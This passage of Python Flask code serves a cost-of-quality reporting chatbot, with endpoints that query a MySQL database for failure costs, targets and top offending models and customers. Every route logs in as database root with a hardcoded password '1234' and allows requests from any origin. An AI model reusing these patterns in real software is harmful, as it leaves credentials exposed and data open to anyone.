            ans = '惡化'
            if rate2 != 0 and (rate - rate2)/rate2 <= 0.05:
                ans = '持平'
        else:
            ans = '持平'
        returnData['較上月'+ans] = str(abs(round(rate-rate2, 2)))+'%'
    finally:
        # BUG FIX: the original never closed the connection, leaking one DB
        # connection per request.
        conn.close()
    answerText = json.dumps(returnData, ensure_ascii=False)
    updateChat(app, yearmonth, 'Q002', answerText, Chat_ID)
    response = jsonify(returnData)
    response.headers.add('Access-Control-Allow-Origin', '*')
    return response
# 3. Q003 CoQ target attainment (applications below target)
@app.route("/Q003", methods=['GET'])
def Q003():
    """List the applications under ``app`` (or all, or one BU) whose CoQ for
    ``yearmonth`` exceeded target, as a comma-joined display string.

    Query-string args: ``app``, ``yearmonth`` (YYYYMM int, clamped to the
    newest fully-loaded month), ``Chat_ID``.  Returns CORS-enabled JSON.
    """
    conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
    try:
        cur = conn.cursor()
        # Deliberately shadows the Flask ``app`` object (route already bound).
        app = request.args.get('app')
        yearmonth = int(request.args.get('yearmonth'))
        Chat_ID = request.args.get('Chat_ID')
        # Newest month with a complete data load (>300 rows present).
        cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
        maxYearmonth = cur.fetchone()[0]
        if yearmonth == '' or yearmonth > maxYearmonth:
            yearmonth = maxYearmonth
        returnData = OrderedDict()
        buList = ['ITI BU','AA BU','MD BU','TV BU']
        appList = ['TV','SET_TV','AA-BD4','NB','MONITOR','IAVM','MP','CE','TABLET','AUTO-BD5']
        # Collect the applications whose actual CoQ (sorting=12) beat the
        # 'Target' row (cost*1e6 converts the target rate to NTD).
        belowStandardApp = ''
        if app == '所有應用' :
            cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target' and app <> %s and app not in ('AII BU','MD BU')) b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000",(yearmonth,app,yearmonth))
            if cur.rowcount > 0 :
                for r in cur :
                    belowStandardApp = belowStandardApp+r[0]+","
                belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
            # NOTE(review): this accumulation_new lookup is executed but its
            # result is never used below — confirm whether it can be removed.
            cur.execute("SELECT IFNULL(a4,0)+IFNULL(a5,0)+IFNULL(a6,0) FROM accumulation_new where app=%s and yearmonth=%s",(app,yearmonth))
            accumulationValue = cur.fetchone()[0]
        elif app == 'MD BU':
            cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('MP','CE','Tablet')",(yearmonth,yearmonth))
            if cur.rowcount > 0 :
                for r in cur :
                    belowStandardApp = belowStandardApp+r[0]+","
                belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
        elif app == 'ITI BU':
            cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('NB','Monitor','IAVM')",(yearmonth,yearmonth))
            if cur.rowcount > 0 :
                for r in cur :
                    belowStandardApp = belowStandardApp+r[0]+","
                belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
        elif app == 'AA BU':
            cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('AA-BD4','AUTO-BD5')",(yearmonth,yearmonth))
            if cur.rowcount > 0 :
                for r in cur :
                    belowStandardApp = belowStandardApp+r[0]+","
                belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
        elif app == 'TV BU':
            cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('TV','SET_TV')",(yearmonth,yearmonth))
            if cur.rowcount > 0 :
                for r in cur :
                    belowStandardApp = belowStandardApp+r[0]+","
                belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
        else :
            belowStandardApp = "'"+app+"'"
        if belowStandardApp == '' :
            belowStandardApp = '都有達標'
        returnData[str(yearmonth)+' '+app+' 未達標應用別'] = belowStandardApp
        answerText = json.dumps(returnData,ensure_ascii=False)
        updateChat(app,yearmonth,'Q003',answerText,Chat_ID)
        response = jsonify(returnData)
        response.headers.add('Access-Control-Allow-Origin', '*')
        return response
    finally:
        # Fix: the connection used to leak on every request.
        conn.close()
# 4. Q004 CoQ Rate current status
@app.route("/Q004", methods=['GET'])
def Q004():
    """Return the CoQ rate for ``yearmonth`` and for the previous month.

    Query-string args: ``app``, ``yearmonth`` (YYYYMM int, clamped to the
    newest fully-loaded month), ``Chat_ID``.  Returns CORS-enabled JSON.
    """
    conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
    try:
        cur = conn.cursor()
        # Deliberately shadows the Flask ``app`` object (route already bound).
        app = request.args.get('app')
        yearmonth = int(request.args.get('yearmonth'))
        Chat_ID = request.args.get('Chat_ID')
        # Newest month with a complete data load (>300 rows present).
        cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
        maxYearmonth = cur.fetchone()[0]
        if yearmonth == '' or yearmonth > maxYearmonth:
            yearmonth = maxYearmonth
        returnData = OrderedDict()
        # Previous month, rolling January back to December of the prior year.
        if yearmonth % 100 == 1:
            yearmonth2 = yearmonth - 100 + 11
        else :
            yearmonth2 = yearmonth - 1
        cur.execute("select GROUP_CONCAT(if(yearmonth = %s, cost, NULL)),GROUP_CONCAT(if(yearmonth = %s, cost, NULL)) from forboard WHERE sorting ='12' and app=%s and yearmonth in (%s,%s)",(yearmonth,yearmonth2,app,yearmonth2,yearmonth))
        r = cur.fetchone()
        rate = round(float(r[0])/10000,2)
        rate2 = round(float(r[1])/10000,2)
        returnData[' '+str(yearmonth)+' '+app+' CoQ Rate 現況<br>(1)'+str(yearmonth2)] = str(rate2)+'%'
        returnData['(2)'+str(yearmonth)] = str(rate)+'%'
        answerText = json.dumps(returnData,ensure_ascii=False)
        updateChat(app,yearmonth,'Q004',answerText,Chat_ID)
        response = jsonify(returnData)
        response.headers.add('Access-Control-Allow-Origin', '*')
        return response
    finally:
        # Fix: the connection used to leak on every request.
        conn.close()
# 5. Q005 what is the prevention cost?
@app.route("/Q005", methods=['GET'])
def Q005():
    """Return the prevention cost (sorting='01') in millions of NTD.

    Query-string args: ``app``, ``yearmonth`` (YYYYMM int, clamped to the
    newest fully-loaded month), ``Chat_ID``.  Returns CORS-enabled JSON.
    """
    conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
    try:
        cur = conn.cursor()
        # Deliberately shadows the Flask ``app`` object (route already bound).
        app = request.args.get('app')
        yearmonth = int(request.args.get('yearmonth'))
        Chat_ID = request.args.get('Chat_ID')
        # Newest month with a complete data load (>300 rows present).
        cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
        maxYearmonth = cur.fetchone()[0]
        if yearmonth == '' or yearmonth > maxYearmonth:
            yearmonth = maxYearmonth
        returnData = OrderedDict()
        cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting='01'",(yearmonth,app))
        returnData[str(yearmonth)+' '+app+' 預防成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)'
        answerText = json.dumps(returnData,ensure_ascii=False)
        updateChat(app,yearmonth,'Q005',answerText,Chat_ID)
        response = jsonify(returnData)
        response.headers.add('Access-Control-Allow-Origin', '*')
        return response
    finally:
        # Fix: the connection used to leak on every request.
        conn.close()
# 6. Q006 what is the appraisal cost?
@app.route("/Q006", methods=['GET'])
def Q006():
    """Return the appraisal cost (sorting='02') in millions of NTD.

    Query-string args: ``app``, ``yearmonth`` (YYYYMM int, clamped to the
    newest fully-loaded month), ``Chat_ID``.  Returns CORS-enabled JSON.
    """
    conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
    try:
        cur = conn.cursor()
        # Deliberately shadows the Flask ``app`` object (route already bound).
        app = request.args.get('app')
        yearmonth = int(request.args.get('yearmonth'))
        Chat_ID = request.args.get('Chat_ID')
        # Newest month with a complete data load (>300 rows present).
        cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
        maxYearmonth = cur.fetchone()[0]
        if yearmonth == '' or yearmonth > maxYearmonth:
            yearmonth = maxYearmonth
        returnData = OrderedDict()
        cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting='02'",(yearmonth,app))
        returnData[str(yearmonth)+' '+app+' 鑑定成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)'
        answerText = json.dumps(returnData,ensure_ascii=False)
        updateChat(app,yearmonth,'Q006',answerText,Chat_ID)
        response = jsonify(returnData)
        response.headers.add('Access-Control-Allow-Origin', '*')
        return response
    finally:
        # Fix: the connection used to leak on every request.
        conn.close()
# 7. Q007 what is the external failure cost?
@app.route("/Q007", methods=['GET'])
def Q007():
    """Return the external failure cost (sum of sorting '04','05','06') in
    millions of NTD.

    Query-string args: ``app``, ``yearmonth`` (YYYYMM int, clamped to the
    newest fully-loaded month), ``Chat_ID``.  Returns CORS-enabled JSON.
    """
    conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
    try:
        cur = conn.cursor()
        # Deliberately shadows the Flask ``app`` object (route already bound).
        app = request.args.get('app')
        yearmonth = int(request.args.get('yearmonth'))
        Chat_ID = request.args.get('Chat_ID')
        # Newest month with a complete data load (>300 rows present).
        cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
        maxYearmonth = cur.fetchone()[0]
        if yearmonth == '' or yearmonth > maxYearmonth:
            yearmonth = maxYearmonth
        returnData = OrderedDict()
        cur.execute("select sum(cost) from forboard where yearmonth=%s and app=%s and sorting in ('04','05','06')",(yearmonth,app))
        returnData[str(yearmonth)+' '+app+' 外失成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)'
        answerText = json.dumps(returnData,ensure_ascii=False)
        updateChat(app,yearmonth,'Q007',answerText,Chat_ID)
        response = jsonify(returnData)
        response.headers.add('Access-Control-Allow-Origin', '*')
        return response
    finally:
        # Fix: the connection used to leak on every request.
        conn.close()
# 8. Q008 what is the internal failure cost?
@app.route("/Q008", methods=['GET'])
def Q008():
    """Return the internal failure cost (sorting='03') in millions of NTD.

    Query-string args: ``app``, ``yearmonth`` (YYYYMM int, clamped to the
    newest fully-loaded month), ``Chat_ID``.  Returns CORS-enabled JSON.
    """
    conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
    try:
        cur = conn.cursor()
        # Deliberately shadows the Flask ``app`` object (route already bound).
        app = request.args.get('app')
        yearmonth = int(request.args.get('yearmonth'))
        Chat_ID = request.args.get('Chat_ID')
        # Newest month with a complete data load (>300 rows present).
        cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
        maxYearmonth = cur.fetchone()[0]
        if yearmonth == '' or yearmonth > maxYearmonth:
            yearmonth = maxYearmonth
        returnData = OrderedDict()
        cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting='03'",(yearmonth,app))
        returnData[str(yearmonth)+' '+app+' 內失成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)'
        answerText = json.dumps(returnData,ensure_ascii=False)
        updateChat(app,yearmonth,'Q008',answerText,Chat_ID)
        response = jsonify(returnData)
        response.headers.add('Access-Control-Allow-Origin', '*')
        return response
    finally:
        # Fix: the connection used to leak on every request.
        conn.close()
# 9. Q009 what is the CoQ rate target?
@app.route("/Q009", methods=['GET'])
def Q009():
    """Return the CoQ rate target (sorting='' row, stored as a fraction) as a
    percentage.

    Query-string args: ``app``, ``yearmonth`` (YYYYMM int, clamped to the
    newest fully-loaded month), ``Chat_ID``.  Returns CORS-enabled JSON.
    """
    conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
    try:
        cur = conn.cursor()
        # Deliberately shadows the Flask ``app`` object (route already bound).
        app = request.args.get('app')
        yearmonth = int(request.args.get('yearmonth'))
        Chat_ID = request.args.get('Chat_ID')
        # Newest month with a complete data load (>300 rows present).
        cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
        maxYearmonth = cur.fetchone()[0]
        if yearmonth == '' or yearmonth > maxYearmonth:
            yearmonth = maxYearmonth
        returnData = OrderedDict()
        cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting=''",(yearmonth,app))
        returnData[str(yearmonth)+' '+app+' Target'] = str(round(float(cur.fetchone()[0])*100,2))+'%'
        answerText = json.dumps(returnData,ensure_ascii=False)
        updateChat(app,yearmonth,'Q009',answerText,Chat_ID)
        response = jsonify(returnData)
        response.headers.add('Access-Control-Allow-Origin', '*')
        return response
    finally:
        # Fix: the connection used to leak on every request.
        conn.close()
# . Q010 what is the external failure warranty cost? sorting='05'
@app.route("/Q010", methods=['GET'])
def Q010():
    """Return the external failure warranty cost (sorting='05') in millions
    of NTD.

    Query-string args: ``app``, ``yearmonth`` (YYYYMM int, clamped to the
    newest fully-loaded month), ``Chat_ID``.  Returns CORS-enabled JSON.
    """
    conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
    try:
        cur = conn.cursor()
        # Deliberately shadows the Flask ``app`` object (route already bound).
        app = request.args.get('app')
        yearmonth = int(request.args.get('yearmonth'))
        Chat_ID = request.args.get('Chat_ID')
        # Newest month with a complete data load (>300 rows present).
        cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
        maxYearmonth = cur.fetchone()[0]
        if yearmonth == '' or yearmonth > maxYearmonth:
            yearmonth = maxYearmonth
        returnData = OrderedDict()
        cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting='05'",(yearmonth,app))
        returnData[str(yearmonth)+' '+app+' 外失售保成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)'
        answerText = json.dumps(returnData,ensure_ascii=False)
        updateChat(app,yearmonth,'Q010',answerText,Chat_ID)
        response = jsonify(returnData)
        response.headers.add('Access-Control-Allow-Origin', '*')
        return response
    finally:
        # Fix: the connection used to leak on every request.
        conn.close()
# . Q011 what is the AERB internal failure cost? sorting='07'
@app.route("/Q011", methods=['GET'])
def Q011():
    """Return the AERB internal failure cost (sorting='07', NULL treated as 0)
    in millions of NTD.

    Query-string args: ``app``, ``yearmonth`` (YYYYMM int, clamped to the
    newest fully-loaded month), ``Chat_ID``.  Returns CORS-enabled JSON.
    """
    conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
    try:
        cur = conn.cursor()
        # Deliberately shadows the Flask ``app`` object (route already bound).
        app = request.args.get('app')
        yearmonth = int(request.args.get('yearmonth'))
        Chat_ID = request.args.get('Chat_ID')
        # Newest month with a complete data load (>300 rows present).
        cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
        maxYearmonth = cur.fetchone()[0]
        if yearmonth == '' or yearmonth > maxYearmonth:
            yearmonth = maxYearmonth
        returnData = OrderedDict()
        cur.execute("select IFNULL(cost, 0) from forboard where yearmonth=%s and app=%s and sorting='07'",(yearmonth,app))
        returnData[str(yearmonth)+' '+app+' AERB內失成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)'
        answerText = json.dumps(returnData,ensure_ascii=False)
        updateChat(app,yearmonth,'Q011',answerText,Chat_ID)
        response = jsonify(returnData)
        response.headers.add('Access-Control-Allow-Origin', '*')
        return response
    finally:
        # Fix: the connection used to leak on every request.
        conn.close()
# . Q012 what is the external failure rebate cost? sorting='06'
@app.route("/Q012", methods=['GET'])
def Q012():
    """Return the external failure rebate cost (sorting='06') in millions of
    NTD.

    Query-string args: ``app``, ``yearmonth`` (YYYYMM int, clamped to the
    newest fully-loaded month), ``Chat_ID``.  Returns CORS-enabled JSON.
    """
    conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
    try:
        cur = conn.cursor()
        # Deliberately shadows the Flask ``app`` object (route already bound).
        app = request.args.get('app')
        yearmonth = int(request.args.get('yearmonth'))
        Chat_ID = request.args.get('Chat_ID')
        # Newest month with a complete data load (>300 rows present).
        cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
        maxYearmonth = cur.fetchone()[0]
        if yearmonth == '' or yearmonth > maxYearmonth:
            yearmonth = maxYearmonth
        returnData = OrderedDict()
        cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting='06'",(yearmonth,app))
        returnData[str(yearmonth)+' '+app+' 外失Rebate成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)'
        answerText = json.dumps(returnData,ensure_ascii=False)
        updateChat(app,yearmonth,'Q012',answerText,Chat_ID)
        response = jsonify(returnData)
        response.headers.add('Access-Control-Allow-Origin', '*')
        return response
    finally:
        # Fix: the connection used to leak on every request.
        conn.close()
# 13. Q013 Top3 Model
@app.route("/Q013", methods=['GET'])
def Q013():
    """List the worst models (by external failure cost) among the below-target
    applications for ``app``/``yearmonth``.

    Query-string args: ``app``, ``yearmonth`` (YYYYMM int, clamped to the
    newest fully-loaded month), ``Chat_ID``.  Returns CORS-enabled JSON.
    """
    conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
    try:
        cur = conn.cursor()
        # Deliberately shadows the Flask ``app`` object (route already bound).
        app = request.args.get('app')
        yearmonth = int(request.args.get('yearmonth'))
        Chat_ID = request.args.get('Chat_ID')
        # Newest month with a complete data load (>300 rows present).
        cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
        maxYearmonth = cur.fetchone()[0]
        if yearmonth == '' or yearmonth > maxYearmonth:
            yearmonth = maxYearmonth
        returnData = OrderedDict()
        buList = ['ITI BU','AA BU','MD BU','TV BU']
        appList = ['TV','SET_TV','AA-BD4','NB','MONITOR','IAVM','MP','CE','TABLET','AUTO-BD5']
        # Collect the below-target applications as a Python list.  Fix: the
        # original concatenated these (and the raw request ``app``) straight
        # into SQL; the list is now passed via parameterized placeholders,
        # closing a SQL-injection hole.
        belowApps = []
        if app == '所有應用' :
            cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target' and app <> %s and app not in ('AII BU','MD BU')) b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000",(yearmonth,app,yearmonth))
            belowApps = [row[0] for row in cur]
        elif app == 'MD BU':
            cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('MP','CE','Tablet')",(yearmonth,yearmonth))
            belowApps = [row[0] for row in cur]
        elif app == 'ITI BU':
            cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('NB','Monitor','IAVM')",(yearmonth,yearmonth))
            belowApps = [row[0] for row in cur]
        elif app == 'AA BU':
            cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('AA-BD4','AUTO-BD5')",(yearmonth,yearmonth))
            belowApps = [row[0] for row in cur]
        elif app == 'TV BU':
            cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('TV','SET_TV')",(yearmonth,yearmonth))
            belowApps = [row[0] for row in cur]
        else :
            belowApps = [app]
        # Top models: board_title length 26 identifies the per-model rows in
        # coq.mc (presumably a fixed report-title format — TODO confirm).
        if belowApps:
            in_clause = ','.join(['%s'] * len(belowApps))
            params = [yearmonth] + belowApps
            if app in buList:
                cur.execute("select bu,model,ROUND(COST/1000000,2) cost,ROUND(rate,1) rate,customer,cost_category,ROUND(BYMODELCUSTOMERCATE_COST/1000000,2) bymodelcustomercate_cost from coq.mc where yearmonth=%s and bu in ("+in_clause+") and length(board_title)=26 and rank = 1 order by rank,cost limit 5",params)
            elif app in appList:
                cur.execute("select bu,model,ROUND(COST/1000000,2) cost,ROUND(rate,1) rate,customer,cost_category,ROUND(BYMODELCUSTOMERCATE_COST/1000000,2) bymodelcustomercate_cost from coq.mc where yearmonth=%s and bu in ("+in_clause+") and length(board_title)=26 order by rank,cost limit 5",params)
            else:
                cur.execute("select distinct bu,model,ROUND(COST/1000000,2) cost,ROUND(rate,1) rate,customer,cost_category,ROUND(BYMODELCUSTOMERCATE_COST/1000000,2) bymodelcustomercate_cost,rank from coq.mc where yearmonth=%s and length(board_title)=26 and bu in ("+in_clause+") order by rank,cost limit 5",params)
            i = 1
            for r in cur :
                returnData['('+str(i)+')'] = r[1]+'外失成本'+str(r[2])+'(M NTD) 佔'+r[0]+'總外失比為'+str(r[3])+'%。該機種以客戶'+str(r[4])+'發生'+str(r[5])+'所佔最高,為'+str(r[6])+'(M NTD)'
                i = i + 1
        returnData[' '+str(yearmonth)+' '+app+' Top3 Model'] = ''
        answerText = json.dumps(returnData,ensure_ascii=False)
        updateChat(app,yearmonth,'Q013',answerText,Chat_ID)
        response = jsonify(returnData)
        response.headers.add('Access-Control-Allow-Origin', '*')
        return response
    finally:
        # Fix: the connection used to leak on every request.
        conn.close()
# 14. Q014 Top3 Customer
@app.route("/Q014", methods=['GET'])
def Q014():
    """List the worst customers (by external failure cost) among the
    below-target applications for ``app``/``yearmonth``.

    Query-string args: ``app``, ``yearmonth`` (YYYYMM int, clamped to the
    newest fully-loaded month), ``Chat_ID``.  Returns CORS-enabled JSON.
    """
    conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
    try:
        cur = conn.cursor()
        # Deliberately shadows the Flask ``app`` object (route already bound).
        app = request.args.get('app')
        yearmonth = int(request.args.get('yearmonth'))
        Chat_ID = request.args.get('Chat_ID')
        # Newest month with a complete data load (>300 rows present).
        cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
        maxYearmonth = cur.fetchone()[0]
        if yearmonth == '' or yearmonth > maxYearmonth:
            yearmonth = maxYearmonth
        returnData = OrderedDict()
        buList = ['ITI BU','AA BU','MD BU','TV BU']
        appList = ['TV','SET_TV','AA-BD4','NB','MONITOR','IAVM','MP','CE','TABLET','AUTO-BD5']
        # Collect the below-target applications as a Python list.  Fix: the
        # original concatenated these (and the raw request ``app``) straight
        # into SQL; the list is now passed via parameterized placeholders,
        # closing a SQL-injection hole.
        belowApps = []
        if app == '所有應用' :
            cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target' and app <> %s and app not in ('AII BU','MD BU')) b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000",(yearmonth,app,yearmonth))
            belowApps = [row[0] for row in cur]
        elif app == 'MD BU':
            cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('MP','CE','Tablet')",(yearmonth,yearmonth))
            belowApps = [row[0] for row in cur]
        elif app == 'ITI BU':
            cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('NB','Monitor','IAVM')",(yearmonth,yearmonth))
            belowApps = [row[0] for row in cur]
        elif app == 'AA BU':
            cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('AA-BD4','AUTO-BD5')",(yearmonth,yearmonth))
            belowApps = [row[0] for row in cur]
        elif app == 'TV BU':
            cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('TV','SET_TV')",(yearmonth,yearmonth))
            belowApps = [row[0] for row in cur]
        else :
            belowApps = [app]
        # Top customers: board_title length 30 identifies the per-customer
        # rows in coq.mc (presumably a fixed report-title format — TODO confirm).
        if belowApps:
            in_clause = ','.join(['%s'] * len(belowApps))
            params = [yearmonth] + belowApps
            if app in buList:
                cur.execute("select bu,customer,ROUND(COST/1000000,2) cost,ROUND(rate,1) rate from coq.mc where yearmonth=%s and bu in ("+in_clause+") and length(board_title)=30 and rank = 1 order by rank,cost limit 5",params)
            elif app in appList:
                cur.execute("select bu,customer,ROUND(COST/1000000,2) cost,ROUND(rate,1) rate from coq.mc where yearmonth=%s and bu in ("+in_clause+") and length(board_title)=30 order by rank,cost limit 5",params)
            else:
                cur.execute("select distinct bu,customer,ROUND(COST/1000000,2) cost,ROUND(rate,1) rate,`rank` from coq.mc where yearmonth=%s and length(board_title)=30 and bu in ("+in_clause+") order by rank,cost limit 5",params)
            i = 1
            for r in cur :
                returnData['('+str(i)+')'] = r[1]+'外失成本'+str(r[2])+' (M NTD) 佔'+r[0]+'總外失比為'+str(r[3])+'%。'
                i = i + 1
        returnData[' '+str(yearmonth)+' '+app+' Top3 Customer'] = ''
        answerText = json.dumps(returnData,ensure_ascii=False)
        updateChat(app,yearmonth,'Q014',answerText,Chat_ID)
        response = jsonify(returnData)
        response.headers.add('Access-Control-Allow-Origin', '*')
        return response
    finally:
        # Fix: the connection used to leak on every request.
        conn.close()
# 15. Q015 expected loss figure
@app.route("/Q015", methods=['GET'])
def Q015():
    """Return the AERB expected future loss (sum over the ``aerb`` table) in
    millions of NTD.  Note the query ignores ``app``; it is used only in the
    display key and for logging.

    Query-string args: ``app``, ``yearmonth`` (YYYYMM int, clamped to the
    newest fully-loaded month), ``Chat_ID``.  Returns CORS-enabled JSON.
    """
    conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
    try:
        cur = conn.cursor()
        # Deliberately shadows the Flask ``app`` object (route already bound).
        app = request.args.get('app')
        yearmonth = int(request.args.get('yearmonth'))
        Chat_ID = request.args.get('Chat_ID')
        # Newest month with a complete data load (>300 rows present).
        cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
        maxYearmonth = cur.fetchone()[0]
        if yearmonth == '' or yearmonth > maxYearmonth:
            yearmonth = maxYearmonth
        cur.execute("SELECT round(sum(total)/1000000,2) FROM aerb where yearmonth=%s",(yearmonth))
        AERB = cur.fetchone()[0]
        returnData = OrderedDict()
        returnData[str(yearmonth)+' '+app+' AERB預期未來損失'] = str(AERB)+'M (NTD)'
        answerText = json.dumps(returnData,ensure_ascii=False)
        updateChat(app,yearmonth,'Q015',answerText,Chat_ID)
        response = jsonify(returnData)
        response.headers.add('Access-Control-Allow-Origin', '*')
        return response
    finally:
        # Fix: the connection used to leak on every request.
        conn.close()
# 16. Q016 2018 full-year CoQ status
@app.route("/Q016", methods=['GET'])
def Q016():
    """Report the 2018 full-year CoQ status: target %, annualized CoQ amount
    and CoQ rate, read from the sentinel yearmonth=201800 rows.

    Query-string args: ``app``, ``Chat_ID``.  Returns CORS-enabled JSON.
    """
    conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
    try:
        cur = conn.cursor()
        # Deliberately shadows the Flask ``app`` object (route already bound).
        app = request.args.get('app')
        Chat_ID = request.args.get('Chat_ID')
        returnData = OrderedDict()
        # sorting='' = target rate, '10' = monthly CoQ (x12 to annualize),
        # '13' = CoQ rate; yearmonth=201800 holds the full-year figures.
        cur.execute("SELECT round(GROUP_CONCAT(if(sorting = '', cost, NULL))*100,2),round(GROUP_CONCAT(if(sorting = '10', cost, NULL))*12/1000000,2),round(GROUP_CONCAT(if(sorting = '13', cost, NULL))/10000,2) FROM forboard where app=%s and yearmonth=201800 and sorting in ('','10','13')",(app))
        for r in cur :
            returnData['2018 '+app+'年度CoQ狀況']=''
            returnData['Target']=str(r[0])+'%'
            returnData['CoQ']=str(r[1])+'M (NTD)'
            returnData['CoQ Rate']=str(r[2])+'%'
        answerText = json.dumps(returnData,ensure_ascii=False)
        updateChat(app,None,'Q016',answerText,Chat_ID)
        response = jsonify(returnData)
        response.headers.add('Access-Control-Allow-Origin', '*')
        return response
    finally:
        # Fix: the connection used to leak on every request.
        conn.close()
# 17. Q017 BU monthly figure
@app.route("/Q017", methods=['GET'])
def Q017():
    """Summarize the BU's year-to-date CoQ position for the newest loaded
    month: cumulative target, spend, remaining budget and average rate.

